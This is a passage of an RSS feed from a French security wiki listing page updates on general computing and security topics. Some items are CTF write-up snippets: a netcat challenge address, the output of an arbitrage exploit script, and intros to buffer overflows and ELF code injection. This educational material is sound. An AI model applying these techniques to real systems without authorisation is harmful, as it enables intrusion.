Si vous voulez un disque externe pour stocker ou sauvegarder vos données, il est en fait plus sage d'acheter à la place un disque dur interne et un boîtier externe pour ce lecteur. La raison en est que la plupart des lecteurs externes sont pré-installés avec des bloatwares inutiles, tels que des logiciels de synchronisation cloud, des program…</description>
    </item>
    <item rdf:about="http://wiki.zenk-security.com/doku.php?id=dns&amp;rev=1509826951&amp;do=diff">
        <dc:format>text/html</dc:format>
        <dc:date>2017-11-04T21:22:31+02:00</dc:date>
        <title>dns</title>
        <link>http://wiki.zenk-security.com/doku.php?id=dns&amp;rev=1509826951&amp;do=diff</link>
        <description>Les Domain Name Systems convertissent les noms de domaine (par exemple. wiki.zenk-security.com) en adresses IP (par exemple. 62.210.200.62). Par défaut, vous utilisez probablement le DNS de votre FAI.

Serveurs DNS alternatifs

Si vous n'êtes pas satisfait des services DNS de votre FAI, tenez compte des éléments suivants:</description>
    </item>
    <item rdf:about="http://wiki.zenk-security.com/doku.php?id=ecran_de_veille&amp;rev=1528399367&amp;do=diff">
        <dc:format>text/html</dc:format>
        <dc:date>2018-06-07T21:22:47+02:00</dc:date>
        <title>ecran_de_veille</title>
        <link>http://wiki.zenk-security.com/doku.php?id=ecran_de_veille&amp;rev=1528399367&amp;do=diff</link>
        <description>Les économiseurs d'écran sont une technologie défunte qui protégeait les moniteurs CRT de «burn in» - une faille dans la conception du CRT qui «brûlerait» une image statique sur l'écran de façon permanente si elle était affichée assez longtemps (plus de 12 heures). Un moniteur affecté par la brûlure pourrait toujours être utilisé pour afficher d'autres images, mais une empreinte fantomatique de l'image brûlée resterait toujours.</description>
    </item>
    <item rdf:about="http://wiki.zenk-security.com/doku.php?id=edward_snowden&amp;rev=1516575447&amp;do=diff">
        <dc:format>text/html</dc:format>
        <dc:date>2018-01-21T23:57:27+02:00</dc:date>
        <title>edward_snowden</title>
        <link>http://wiki.zenk-security.com/doku.php?id=edward_snowden&amp;rev=1516575447&amp;do=diff</link>
        <description>Edward Joseph Snowden, né le 21 juin 1983 à Elizabeth City, Caroline du Nord, est un informaticien américain, ancien employé de la Central Intelligence Agency (CIA) et de la National Security Agency (NSA), qui a révélé les détails de plusieurs programmes de surveillance de masse américains et britanniques.</description>
    </item>
    <item rdf:about="http://wiki.zenk-security.com/doku.php?id=eff&amp;rev=1509827871&amp;do=diff">
        <dc:format>text/html</dc:format>
        <dc:date>2017-11-04T21:37:51+02:00</dc:date>
        <title>eff</title>
        <link>http://wiki.zenk-security.com/doku.php?id=eff&amp;rev=1509827871&amp;do=diff</link>
        <description>L' Electronic Frontiers Foundation est la principale organisation à but non lucratif défendant les libertés civiles dans le monde numérique.

Fondé en 1990, l'EFF défend la vie privée des utilisateurs, la liberté d'expression et l'innovation par le biais de litiges d'impact, d'analyse des politiques, d'activisme populaire et de développement technologique. Ils ont été fondés après l'opération d'infiltration illégale connue sous le nom de “Opération Sundevil” qui a prouvé l'ineptie de l'applicati…</description>
    </item>
    <item rdf:about="http://wiki.zenk-security.com/doku.php?id=environnement_de_bureau&amp;rev=1590187738&amp;do=diff">
        <dc:format>text/html</dc:format>
        <dc:date>2020-05-23T00:48:58+02:00</dc:date>
        <title>environnement_de_bureau</title>
        <link>http://wiki.zenk-security.com/doku.php?id=environnement_de_bureau&amp;rev=1590187738&amp;do=diff</link>
        <description>[GNOME 3.10]
[MATE 1.6]
[Cinnamon 2.0]
[Unity - Ubuntu 13.10]
[Pantheon - eOS 0.2]
[KDE 4.12]
[XFCE 4.10]
[LXDE]
[LXQT]

Un environnement de bureau fournit un cadre pour le développement de modules. En plus de cela, un environnement de bureau complet contient une myriade de composants qui travaillent ensemble pour fournir à l'utilisateur un environnement de travail. Parmi les plus importants, nous pouvons lister le moteur de thème et le gestionnaire de fenêtres.</description>
    </item>
    <item rdf:about="http://wiki.zenk-security.com/doku.php?id=erreurnc&amp;rev=1436625673&amp;do=diff">
        <dc:format>text/html</dc:format>
        <dc:date>2015-07-11T16:41:13+02:00</dc:date>
        <title>erreurnc</title>
        <link>http://wiki.zenk-security.com/doku.php?id=erreurnc&amp;rev=1436625673&amp;do=diff</link>
        <description>Solutions Newbie Contest

Vous essayez d'accéder à une page proposant une solution pour une des épreuves du site Newbie Contest. 

Par respect pour les auteurs des épreuves et en accord avec le staff de Newbie Contest, Zenk-Security a décidé de restreindre l'accès à ces solutions aux utilisateurs enregistrés disposant d'un minimum de 20 points sur la plateforme d'épreuves de Zenk-Security.</description>
    </item>
    <item rdf:about="http://wiki.zenk-security.com/doku.php?id=ethernet&amp;rev=1576986962&amp;do=diff">
        <dc:format>text/html</dc:format>
        <dc:date>2019-12-22T04:56:02+02:00</dc:date>
        <title>ethernet</title>
        <link>http://wiki.zenk-security.com/doku.php?id=ethernet&amp;rev=1576986962&amp;do=diff</link>
        <description>Ethernet

Ethernet est une norme de mise en réseau filaire comprenant des ports, des câbles et des périphériques réseau standardisés.

Le protocole Ethernet a ses racines dans ALOHAnet, un des premiers réseaux pré-Internet créé par l'Université d'Hawaï.
Le câble Ethernet est une interface RJ-45 qui utilise l'une des deux normes de câblage. Ce sont les normes T568.</description>
    </item>
    <item rdf:about="http://wiki.zenk-security.com/doku.php?id=exploit_exercises_protostar&amp;rev=1491744837&amp;do=diff">
        <dc:format>text/html</dc:format>
        <dc:date>2017-04-09T15:33:57+02:00</dc:date>
        <title>exploit_exercises_protostar</title>
        <link>http://wiki.zenk-security.com/doku.php?id=exploit_exercises_protostar&amp;rev=1491744837&amp;do=diff</link>
        <description>Protostar est une machine virtuelle proposé par Exploit-Exercises.com. C'est un entrainement de base à la corruption de mémoire sur Linux/x86.

La machine virtuelle est téléchargeable au format OVA, il faut l'ouvrir avec VirtualBox, il est normalement possible de la convertir pour VMWare.</description>
    </item>
    <item rdf:about="http://wiki.zenk-security.com/doku.php?id=failles_app&amp;rev=1491744837&amp;do=diff">
        <dc:format>text/html</dc:format>
        <dc:date>2017-04-09T15:33:57+02:00</dc:date>
        <title>failles_app</title>
        <link>http://wiki.zenk-security.com/doku.php?id=failles_app&amp;rev=1491744837&amp;do=diff</link>
        <description>Cette page a pour but de lister les différentes failles applicatives que l'on peut rencontrer.

	*  Buffer overflow Débordemements de tampon
	*  Format String Exploitation d'une format string avec printf
	*  Race conditions
	*  Heap overflow Corruption du tas
	*  Stack Canary Contournement des “stack canaries”
	*  ASLR Bypass de l'Address space layout randomization</description>
    </item>
    <item rdf:about="http://wiki.zenk-security.com/doku.php?id=failles_web&amp;rev=1581184299&amp;do=diff">
        <dc:format>text/html</dc:format>
        <dc:date>2020-02-08T18:51:39+02:00</dc:date>
        <title>failles_web</title>
        <link>http://wiki.zenk-security.com/doku.php?id=failles_web&amp;rev=1581184299&amp;do=diff</link>
        <description>FIXME Le PAD pour proposer une amélioration à cette page : &lt;https://pad.zenk-security.com/p/merci&gt;

Les failles web peuvent se décomposer en deux grandes parties : les failles qui s'attaquent au client et celles qui s'attaquent au serveur.

Côté client

	*  XSS - Explications sur les XSS
	*  CSRF - Explications sur les CSRF
	*  SOP - Bypass de la Same Origin Policy
	*  HTTP Response Splitting - Explications sur les HRS</description>
    </item>
    <item rdf:about="http://wiki.zenk-security.com/doku.php?id=films&amp;rev=1699524605&amp;do=diff">
        <dc:format>text/html</dc:format>
        <dc:date>2023-11-09T11:10:05+02:00</dc:date>
        <title>films</title>
        <link>http://wiki.zenk-security.com/doku.php?id=films&amp;rev=1699524605&amp;do=diff</link>
        <description>Cette page fournit une liste de films qui gravite autour des sphères de la technologie informatique, science-fiction, mais aussi des films cyberpunks, des documentaires, des biographies...

Fiction

Animation

Akira [Le shot de la moto emblématique de Tetsuo]</description>
    </item>
    <item rdf:about="http://wiki.zenk-security.com/doku.php?id=firefox&amp;rev=1509885387&amp;do=diff">
        <dc:format>text/html</dc:format>
        <dc:date>2017-11-05T13:36:27+02:00</dc:date>
        <title>firefox</title>
        <link>http://wiki.zenk-security.com/doku.php?id=firefox&amp;rev=1509885387&amp;do=diff</link>
        <description>Firefox est un navigateur web libre et gratuit, développé et distribué par la Mozilla Foundation avec l'aide de milliers de bénévoles grâce aux méthodes de développement du logiciel libre/open source et à la liberté du code source.

Branches officielles

Malheureusement, la série v3.6.x de Firefox n'est plus supportée. Il ne recevra plus les mises à jour de sécurité ou de stabilité.</description>
    </item>
    <item rdf:about="http://wiki.zenk-security.com/doku.php?id=fonctionnement&amp;rev=1435432355&amp;do=diff">
        <dc:format>text/html</dc:format>
        <dc:date>2015-06-27T21:12:35+02:00</dc:date>
        <title>fonctionnement</title>
        <link>http://wiki.zenk-security.com/doku.php?id=fonctionnement&amp;rev=1435432355&amp;do=diff</link>
        <description>Principe

Cet espace se propose de mettre à la disposition de tous le savoir de passionnés de sécurité informatique.

En aucun cas la connaissance contenue dans ce wiki n'est exhaustive et nous vous encourageons à l'alimenter, une manière d'ajouter votre pierre à l'édifice que nous tentons d'ériger.</description>
    </item>
    <item rdf:about="http://wiki.zenk-security.com/doku.php?id=forbiddenbits_2013&amp;rev=1491744837&amp;do=diff">
        <dc:format>text/html</dc:format>
        <dc:date>2017-04-09T15:33:57+02:00</dc:date>
        <title>forbiddenbits_2013</title>
        <link>http://wiki.zenk-security.com/doku.php?id=forbiddenbits_2013&amp;rev=1491744837&amp;do=diff</link>
        <description>Forbidden Bits est un CTF de type Jeopardy par équpe.

	*  NaziWar
	*  x93
	*  x94
	*  Crunch</description>
    </item>
    <item rdf:about="http://wiki.zenk-security.com/doku.php?id=forbiddenbits_2013_crunch&amp;rev=1491744837&amp;do=diff">
        <dc:format>text/html</dc:format>
        <dc:date>2017-04-09T15:33:57+02:00</dc:date>
        <title>forbiddenbits_2013_crunch</title>
        <link>http://wiki.zenk-security.com/doku.php?id=forbiddenbits_2013_crunch&amp;rev=1491744837&amp;do=diff</link>
        <description>Captain Crunch (250)

Help the captain to find the flag!
http://forbiddenbits.net/tasks/spawn.png

Overview

On se retrouve avec une image PNG toute noir.

Solution

En regardant de plus près, il existe des pixels de (0, 0, 0) et de (1, 1, 1) (RGB).
En convertissant les (0, 0, 0) en Blanc et les (1, 1, 1) en Noir, on se retrouve avec un QRCode.</description>
    </item>
    <item rdf:about="http://wiki.zenk-security.com/doku.php?id=forbiddenbits_2013_naziwar&amp;rev=1491744837&amp;do=diff">
        <dc:format>text/html</dc:format>
        <dc:date>2017-04-09T15:33:57+02:00</dc:date>
        <title>forbiddenbits_2013_naziwar</title>
        <link>http://wiki.zenk-security.com/doku.php?id=forbiddenbits_2013_naziwar&amp;rev=1491744837&amp;do=diff</link>
        <description>Nazi War (200)

Let the nazi war begin.
My fuhrer will launch it: nc 88.190.221.116 1337

Overview

On se retrouve avec un service qui nous permet de nous connecter à une interface pour lire des fichiers.

Pour se connecter, on nous demande d'entrer un nom d'utilisateur pour générer un mot de passe associé.</description>
    </item>
    <item rdf:about="http://wiki.zenk-security.com/doku.php?id=forbiddenbits_2013_x93&amp;rev=1491744837&amp;do=diff">
        <dc:format>text/html</dc:format>
        <dc:date>2017-04-09T15:33:57+02:00</dc:date>
        <title>forbiddenbits_2013_x93</title>
        <link>http://wiki.zenk-security.com/doku.php?id=forbiddenbits_2013_x93&amp;rev=1491744837&amp;do=diff</link>
        <description>x93 (350)

i wanna access the restricted area
95.170.83.28:3003

Overview

On se connecte à un service où il est possible de faire des échanges de monnaie (d'une monnaie à une autre).
Qui dit échanges, dit taux.
Passer d'une monnaie à une autre puis faire le chemin inverse revient à perdre ou à gagner de l'argent !</description>
    </item>
    <item rdf:about="http://wiki.zenk-security.com/doku.php?id=forbiddenbits_2013_x94&amp;rev=1491744837&amp;do=diff">
        <dc:format>text/html</dc:format>
        <dc:date>2017-04-09T15:33:57+02:00</dc:date>
        <title>forbiddenbits_2013_x94</title>
        <link>http://wiki.zenk-security.com/doku.php?id=forbiddenbits_2013_x94&amp;rev=1491744837&amp;do=diff</link>
        <description>x94 (250)

i wanna access the restricted area
95.170.83.28:3002

Overview

L'épreuve est EXACTEMENT la même que x93.

Solution

Seul le port de l'exploit de x93 change.

C:\CTF\FBCTF\x94&gt;script.py
EUR =&gt; 253.85
GBP =&gt; 218.31
EUR =&gt; 335.86
GBP =&gt; 288.84
EUR =&gt; 444.37
GBP =&gt; 382.16
EUR =&gt; 587.94
GBP =&gt; 505.63
EUR =&gt; 777.89
GBP =&gt; 668.99
EUR =&gt; 1029.22
GBP =&gt; 885.13
EUR =&gt; 1361.74
GBP =&gt; 1171.1
EUR =&gt; 1801.69
GBP =&gt; 1549.45
EUR =&gt; 2383.77
GBP =&gt; 2050.04
EUR =&gt; 3153.91
GBP =&gt; 2712.36
EUR =&gt; 4172.86
…</description>
    </item>
    <item rdf:about="http://wiki.zenk-security.com/doku.php?id=ftp&amp;rev=1509825103&amp;do=diff">
        <dc:format>text/html</dc:format>
        <dc:date>2017-11-04T20:51:43+02:00</dc:date>
        <title>ftp</title>
        <link>http://wiki.zenk-security.com/doku.php?id=ftp&amp;rev=1509825103&amp;do=diff</link>
        <description>Le File Transfer Protocol est un protocole développé au début des années 1980 pour le transfert rapide de fichiers d'un serveur à un autre. Il est lentement en train de disparaître, mais est toujours populaire parmi certains groupes les plus intransigeants.</description>
    </item>
    <item rdf:about="http://wiki.zenk-security.com/doku.php?id=gadgets_hardware&amp;rev=1734534206&amp;do=diff">
        <dc:format>text/html</dc:format>
        <dc:date>2024-12-18T16:03:26+02:00</dc:date>
        <title>gadgets_hardware</title>
        <link>http://wiki.zenk-security.com/doku.php?id=gadgets_hardware&amp;rev=1734534206&amp;do=diff</link>
        <description>Cette page liste le matos que les membres de Zenk utilise pour faire mumuze avec le hardware, quelque soit le contexte.

 DSlogic U16pro

Le DSlogic U16pro est un analyseur logique USB, qui a une taille portable, mais des performances
puissantes (fréquence d'échantillonnage jusqu'à 1 GHz, interface USB 3.0). Avec le logiciel multiplateforme DSView, vous pouvez utiliser votre ordinateur pour sniff ce qui transit entre les composants.</description>
    </item>
    <item rdf:about="http://wiki.zenk-security.com/doku.php?id=gcc&amp;rev=1509896578&amp;do=diff">
        <dc:format>text/html</dc:format>
        <dc:date>2017-11-05T16:42:58+02:00</dc:date>
        <title>gcc</title>
        <link>http://wiki.zenk-security.com/doku.php?id=gcc&amp;rev=1509896578&amp;do=diff</link>
        <description>GCC signifie GNU Compiler Collection. C'est un système de compilation sous licence GPL qui fait partie de la chaîne d'outils GNU. A l'origine, il s'agissait de GNU C Compiler car il ne pouvait que compiler C, mais il a depuis pris en charge plusieurs langages.</description>
    </item>
    <item rdf:about="http://wiki.zenk-security.com/doku.php?id=ghidra&amp;rev=1554158749&amp;do=diff">
        <dc:format>text/html</dc:format>
        <dc:date>2019-04-02T00:45:49+02:00</dc:date>
        <title>ghidra</title>
        <link>http://wiki.zenk-security.com/doku.php?id=ghidra&amp;rev=1554158749&amp;do=diff</link>
        <description>&lt;https://ghidra-sre.org/&gt;

Présentations et tutoriels

	*  Cours “officiels” : &lt;https://ghidra.re/online-courses/&gt;
	*  Un excellent article faisant le tour des fonctionnalités principales de Ghidra: &lt;http://0xeb.net/2019/03/ghidra-a-quick-overview/&gt;
	*  Un autre moins complet: &lt;https://blog.because-security.com/t/ghidra-wiki/431#PEheadergets125&gt;
	*  Création d'un loader wasm pour Ghidra, présente la création d'un plugin Ghidra: &lt;https://habr.com/en/post/443318/&gt;
	*  Article expliquant comment pa…</description>
    </item>
    <item rdf:about="http://wiki.zenk-security.com/doku.php?id=gimp&amp;rev=1517102833&amp;do=diff">
        <dc:format>text/html</dc:format>
        <dc:date>2018-01-28T02:27:13+02:00</dc:date>
        <title>gimp</title>
        <link>http://wiki.zenk-security.com/doku.php?id=gimp&amp;rev=1517102833&amp;do=diff</link>
        <description>GNU Image Manipulation Tool (ou GIMP en abrégé), est un remplacement libre des solutions de retouche de logiciels propriétaires, telles qu'Adobe Photoshop ou Paint.net.

Controverse

SourceForge

Voir SourceForge

Utilisabilité

GIMP a été critiqué à plusieurs reprises pour ça maniabilité d'utilisation, beaucoup prétendant que Photoshop est beaucoup plus facile à utiliser. L'une des critiques les plus courantes est le manque de couches d'ajustement.</description>
    </item>
    <item rdf:about="http://wiki.zenk-security.com/doku.php?id=git&amp;rev=1509897779&amp;do=diff">
        <dc:format>text/html</dc:format>
        <dc:date>2017-11-05T17:02:59+02:00</dc:date>
        <title>git</title>
        <link>http://wiki.zenk-security.com/doku.php?id=git&amp;rev=1509897779&amp;do=diff</link>
        <description>Git est un système de contrôle de version distribué. Il est conçu pour être rapide, simple et puissant. Il a été créé par Linus Torvalds, et il est utilisé pour suivre le code source du noyau Linux ainsi que son propre code source. Pour une discussion colorée et intéressante sur la création de Git par Torvalds lui-même, regardez cette vidéo.</description>
    </item>
    <item rdf:about="http://wiki.zenk-security.com/doku.php?id=github_leak&amp;rev=1595573440&amp;do=diff">
        <dc:format>text/html</dc:format>
        <dc:date>2020-07-24T08:50:40+02:00</dc:date>
        <title>github_leak</title>
        <link>http://wiki.zenk-security.com/doku.php?id=github_leak&amp;rev=1595573440&amp;do=diff</link>
        <description>FIXME Le PAD pour proposer une amélioration à cette page : &lt;https://pad.zenk-security.com/p/merci&gt;

🛠 Github Scraper For Static Code Analysis &lt;https://github.com/cwinfosec/github_autopwn&gt;

🛠 Prevents you from committing secrets and credentials into git repositories
&lt;https://github.com/awslabs/git-secrets&gt;</description>
    </item>
    <item rdf:about="http://wiki.zenk-security.com/doku.php?id=google_chrome&amp;rev=1509794903&amp;do=diff">
        <dc:format>text/html</dc:format>
        <dc:date>2017-11-04T12:28:23+02:00</dc:date>
        <title>google_chrome</title>
        <link>http://wiki.zenk-security.com/doku.php?id=google_chrome&amp;rev=1509794903&amp;do=diff</link>
        <description>*  Envoie le nom du fichier que vous téléchargez a Google pour regarder s’il est dans une liste noire; stocke votre adresse IP associée au fichier pour quelques semaines.[1]
	*  Chaque URLs que vous commencer à taper dans votre barre d'adresse et envoyer a Google, entièrement ou fragmenté, pour faire de l'autocomplétion.[2][3]
	*  Il se connecte a Google toutes les 30 minutes pour télécharger une liste d'URLs malicieuses, donc le fait que vous ayez Chrome d'ouvert est transmis a Google.[1]
	*  D…</description>
    </item>
    <item rdf:about="http://wiki.zenk-security.com/doku.php?id=hack.lu_2014&amp;rev=1491744837&amp;do=diff">
        <dc:format>text/html</dc:format>
        <dc:date>2017-04-09T15:33:57+02:00</dc:date>
        <title>hack.lu_2014</title>
        <link>http://wiki.zenk-security.com/doku.php?id=hack.lu_2014&amp;rev=1491744837&amp;do=diff</link>
        <description>Hack.lu 2014
 # Title Category Author(s) Points 1  wiener  Crypto  javex  300 (+ 90)  2  Cryptochief  Reversing  chief  400 (+ 100)  3  OREO  Exploiting  cutz  400 (+ 100)  4  Gunslinger Joe's private Terminal  Misc  cutz  50 (+ 20)  5  breakout  Exploiting  r1cky  500 (+ 100)  6  Gunslinger Joe's Gold Stash  Reversing  cutz  200 (+ 90)  7  Holy Moses  Exploiting  r1cky  300 (+ 100)  8  Big Jim's Map  Reversing  r1cky  400 (+ 100)  9  ImageUpload  Web  SLAZ  200 (+ 70)  10  ionpuke  Reversing  t…</description>
    </item>
    <item rdf:about="http://wiki.zenk-security.com/doku.php?id=hacking_case&amp;rev=1409606849&amp;do=diff">
        <dc:format>text/html</dc:format>
        <dc:date>2014-09-01T23:27:29+02:00</dc:date>
        <title>hacking_case</title>
        <link>http://wiki.zenk-security.com/doku.php?id=hacking_case&amp;rev=1409606849&amp;do=diff</link>
        <description>1. What is the image hash? Does the acquisition and verification hash match? 

2. What operating system was used on the computer?  



root@kali:/mnt/2to/nist# file image.dd 
image.dd: x86 boot sector, Microsoft Windows XP MBR, Serial 0xec5dec5d; partition 1: ID=0x7, active, starthead 1, startsector 63, 9510417 sectors, code offset 0xc0
root@kali:/mnt/2to/nist# mmls image.dd 
DOS Partition Table
Offset Sector: 0
Units are in 512-byte sectors

     Slot    Start        End          Length       D…</description>
    </item>
    <item rdf:about="http://wiki.zenk-security.com/doku.php?id=hackingweek_2014&amp;rev=1393453233&amp;do=diff">
        <dc:format>text/html</dc:format>
        <dc:date>2014-02-26T23:20:33+02:00</dc:date>
        <title>hackingweek_2014</title>
        <link>http://wiki.zenk-security.com/doku.php?id=hackingweek_2014&amp;rev=1393453233&amp;do=diff</link>
        <description>Crypto

	*  Crypto-1
	*  Crypto-2
	*  Crypto-3
	*  Crypto-4
	*  Crypto-5

Exploit

	*  Exploit-1
	*  Exploit-2
	*  Exploit-3
	*  Exploit-4
	*  Exploit-5

Reverse

	*  Reverse-1
	*  Reverse-2
	*  Reverse-3
	*  Reverse-4
	*  Reverse-5

Web

	*  Web-1
	*  Web-2
	*  Web-3
	*  Web-4
	*  Web-5</description>
    </item>
    <item rdf:about="http://wiki.zenk-security.com/doku.php?id=htpc&amp;rev=1516787431&amp;do=diff">
        <dc:format>text/html</dc:format>
        <dc:date>2018-01-24T10:50:31+02:00</dc:date>
        <title>htpc</title>
        <link>http://wiki.zenk-security.com/doku.php?id=htpc&amp;rev=1516787431&amp;do=diff</link>
        <description>Un home theater personal computer, couramment abrégé sous le sigle HTPC, est un ordinateur personnel destiné au home cinema. Il réunit en un seul composant (l’unité centrale) la plupart, sinon tous les composants d’un ensemble home cinema traditionnel.</description>
    </item>
    <item rdf:about="http://wiki.zenk-security.com/doku.php?id=ian_murdock&amp;rev=1557684103&amp;do=diff">
        <dc:format>text/html</dc:format>
        <dc:date>2019-05-12T20:01:43+02:00</dc:date>
        <title>ian_murdock</title>
        <link>http://wiki.zenk-security.com/doku.php?id=ian_murdock&amp;rev=1557684103&amp;do=diff</link>
        <description>Ian Murdock, né le 28 avril 1973 à Constance en Allemagne de l'Ouest, et mort le 28 décembre 2015 (à 42 ans) il est le fondateur du projet Debian.

Il se marie à Debra Lynn, dont la contraction du prénom avec le sien donne son nom à la distribution Debian.</description>
    </item>
    <item rdf:about="http://wiki.zenk-security.com/doku.php?id=ide_plugins&amp;rev=1572001251&amp;do=diff">
        <dc:format>text/html</dc:format>
        <dc:date>2019-10-25T13:00:51+02:00</dc:date>
        <title>ide_plugins</title>
        <link>http://wiki.zenk-security.com/doku.php?id=ide_plugins&amp;rev=1572001251&amp;do=diff</link>
        <description>FIXME Le PAD pour proposer une amélioration à cette page : &lt;https://pad.zenk-security.com/p/merci&gt;

🛠 [Attackflow Extension](&lt;https://www.attackflow.com/Extension&gt;) :copyright: - Attackflow plugin for Visual Studio, which enables developers to find critical security bugs at real time in the source code without any prior knowledge.</description>
    </item>
    <item rdf:about="http://wiki.zenk-security.com/doku.php?id=impression_3d&amp;rev=1599144176&amp;do=diff">
        <dc:format>text/html</dc:format>
        <dc:date>2020-09-03T16:42:56+02:00</dc:date>
        <title>impression_3d</title>
        <link>http://wiki.zenk-security.com/doku.php?id=impression_3d&amp;rev=1599144176&amp;do=diff</link>
        <description>[Sunhokey prusa i3 2015]

Également connue sous le nom de fabrication additive, l'impression 3D est l'un des processus permettant de créer un objet en trois dimensions. Bien qu’il s’agisse d’une pratique qui n’était jusqu’à il ya une dizaine d’années rarement utiliser, de nos jours l'impression 3D se popularise énormément. Beaucoups de nouvelle entreprises ont vu le jours dans le domaine de la fabrication d’imprimantes 3D, les services d'impressions a la demande, et tout ce qui concerne l’impres…</description>
    </item>
    <item rdf:about="http://wiki.zenk-security.com/doku.php?id=injection_elf&amp;rev=1571078562&amp;do=diff">
        <dc:format>text/html</dc:format>
        <dc:date>2019-10-14T20:42:42+02:00</dc:date>
        <title>injection_elf</title>
        <link>http://wiki.zenk-security.com/doku.php?id=injection_elf&amp;rev=1571078562&amp;do=diff</link>
        <description>Le PAD pour améliorer cette page : &lt;https://pad.zenk-security.com/p/merci&gt;

TODO

	*  Détailler plus le format ELF
	*  Expliquer différentes injections

Cet article va vous présenter les différentes techniques qui existent afin d'injecter du code de manière statique dans un fichier ELF, que ce soit sur architecture 32 bits ou 64 bits, sous une distribution GNU/Linux.</description>
    </item>
    <item rdf:about="http://wiki.zenk-security.com/doku.php?id=installation_de_shadow_defender&amp;rev=1371201515&amp;do=diff">
        <dc:format>text/html</dc:format>
        <dc:date>2013-06-14T11:18:35+02:00</dc:date>
        <title>installation_de_shadow_defender</title>
        <link>http://wiki.zenk-security.com/doku.php?id=installation_de_shadow_defender&amp;rev=1371201515&amp;do=diff</link>
        <description>Shadow Defender permet de fournir une protection un peu particulière, toutes les modifications du systéme sont annulés (copie de fichiers, installation de programmes ... )une fois le système redémarré ce dernier reprend son état initial lors de l'activation de la protection .
bien entendu il faut faire attention puisque cette protection pourrai se retourner contre vous en supprimant des fichiers que vous aurez voulu garder !</description>
    </item>
    <item rdf:about="http://wiki.zenk-security.com/doku.php?id=installation_de_windows_xp_et_des_additions_invites_sous_virtualbox&amp;rev=1371197878&amp;do=diff">
        <dc:format>text/html</dc:format>
        <dc:date>2013-06-14T10:17:58+02:00</dc:date>
        <title>installation_de_windows_xp_et_des_additions_invites_sous_virtualbox</title>
        <link>http://wiki.zenk-security.com/doku.php?id=installation_de_windows_xp_et_des_additions_invites_sous_virtualbox&amp;rev=1371197878&amp;do=diff</link>
        <description>Installation de Windows Xp

Une fois VirtualBox lancé :



Cliquez sur New



Cliquez sur Next



Choisissez un nom pour votre machine ainsi que le système d'exploitation et cliquez sur Next



Choisissez le montant de mémoire vive que vous désirez donner au Os, notez que si vous n'avez que peu de mémoire vive, 256 MB feront largement l'affaire .</description>
    </item>
    <item rdf:about="http://wiki.zenk-security.com/doku.php?id=ios&amp;rev=1572172591&amp;do=diff">
        <dc:format>text/html</dc:format>
        <dc:date>2019-10-27T11:36:31+02:00</dc:date>
        <title>ios</title>
        <link>http://wiki.zenk-security.com/doku.php?id=ios&amp;rev=1572172591&amp;do=diff</link>
        <description>FIXME Le PAD pour proposer une amélioration à cette page : &lt;https://pad.zenk-security.com/p/merci&gt;

Open-source jailbreaking tool for many iOS devices &lt;https://github.com/axi0mX/ipwndfu&gt;

A completely free, open source and online course about Reverse Engineering iOS Applications.  &lt;https://github.com/ivRodriguezCA/RE-iOS-Apps&gt;</description>
    </item>
    <item rdf:about="http://wiki.zenk-security.com/doku.php?id=ipfs&amp;rev=1517090070&amp;do=diff">
        <dc:format>text/html</dc:format>
        <dc:date>2018-01-27T22:54:30+02:00</dc:date>
        <title>ipfs</title>
        <link>http://wiki.zenk-security.com/doku.php?id=ipfs&amp;rev=1517090070&amp;do=diff</link>
        <description>InterPlanetary File System (ou IPFS, système de fichier inter-planétaire), est un protocole pair à pair de distribution de contenu adressable par hypermédia, conçu à l'origine par Juan Benet. L'implémentation principale d'IPFS est un logiciel libre dirigée par l'Interplanetary Networks.</description>
    </item>
    <item rdf:about="http://wiki.zenk-security.com/doku.php?id=irc&amp;rev=1551369898&amp;do=diff">
        <dc:format>text/html</dc:format>
        <dc:date>2019-02-28T17:04:58+02:00</dc:date>
        <title>irc</title>
        <link>http://wiki.zenk-security.com/doku.php?id=irc&amp;rev=1551369898&amp;do=diff</link>
        <description>Internet Relay Chat (IRC) est un système qui facilite le transfert de messages sous forme de texte. Le processus de discussion fonctionne sur un modèle de réseau client/serveur. Les clients IRC sont des programmes informatiques qu'un utilisateur peut installer sur son système. Ces clients peuvent communiquer avec des serveurs de discussion pour transférer des messages à d'autres clients.</description>
    </item>
    <item rdf:about="http://wiki.zenk-security.com/doku.php?id=java&amp;rev=1572000991&amp;do=diff">
        <dc:format>text/html</dc:format>
        <dc:date>2019-10-25T12:56:31+02:00</dc:date>
        <title>java</title>
        <link>http://wiki.zenk-security.com/doku.php?id=java&amp;rev=1572000991&amp;do=diff</link>
        <description>FIXME Le PAD pour proposer une amélioration à cette page : &lt;https://pad.zenk-security.com/p/merci&gt;

🛠 [Checker Framework](&lt;https://github.com/typetools/checker-framework/&gt;) - Pluggable type-checking for Java &lt;http://checkerframework.org/&gt;

🛠 [checkstyle](&lt;https://github.com/checkstyle/checkstyle&gt;) - checking Java source code for adherence to a Code Standard or set of validation rules (best practices)</description>
    </item>
    <item rdf:about="http://wiki.zenk-security.com/doku.php?id=java_web&amp;rev=1572001011&amp;do=diff">
        <dc:format>text/html</dc:format>
        <dc:date>2019-10-25T12:56:51+02:00</dc:date>
        <title>java_web</title>
        <link>http://wiki.zenk-security.com/doku.php?id=java_web&amp;rev=1572001011&amp;do=diff</link>
        <description>FIXME Le PAD pour proposer une amélioration à cette page : &lt;https://pad.zenk-security.com/p/merci&gt;

🛠  We help your business to secure PHP and Java web applications with language specific code analysis.  &lt;https://www.ripstech.com/&gt;

🛠  xanitizer &lt;https://www.xanitizer.com/xanitizer/&gt;</description>
    </item>
    <item rdf:about="http://wiki.zenk-security.com/doku.php?id=jeux_video&amp;rev=1583507798&amp;do=diff">
        <dc:format>text/html</dc:format>
        <dc:date>2020-03-06T16:16:38+02:00</dc:date>
        <title>jeux_video</title>
        <link>http://wiki.zenk-security.com/doku.php?id=jeux_video&amp;rev=1583507798&amp;do=diff</link>
        <description>Jeux vidéo liés au hacking

	*  Syndicate (1993) - RTS avec un thème cyberpunk. 

	*  Syndicate Wars (1996) - RTS avec un thème cyberpunk. 

	*  Uplink (2001) - Terminal hacking simulator. 

	*  Enter the Matrix (2003) - Écrit par les créateurs de Matrix et contenant une heure de cinématiques filmées pendant Matrix 2, le jeu était énormément buggé a sont lancement et a déçu des millions de fans. même avec les patch officiels et patchs de fans c'est toujours pas terrible. 

	*  The Matrix: Path o…</description>
    </item>
    <item rdf:about="http://wiki.zenk-security.com/doku.php?id=js_scripts&amp;rev=1572001041&amp;do=diff">
        <dc:format>text/html</dc:format>
        <dc:date>2019-10-25T12:57:21+02:00</dc:date>
        <title>js_scripts</title>
        <link>http://wiki.zenk-security.com/doku.php?id=js_scripts&amp;rev=1572001041&amp;do=diff</link>
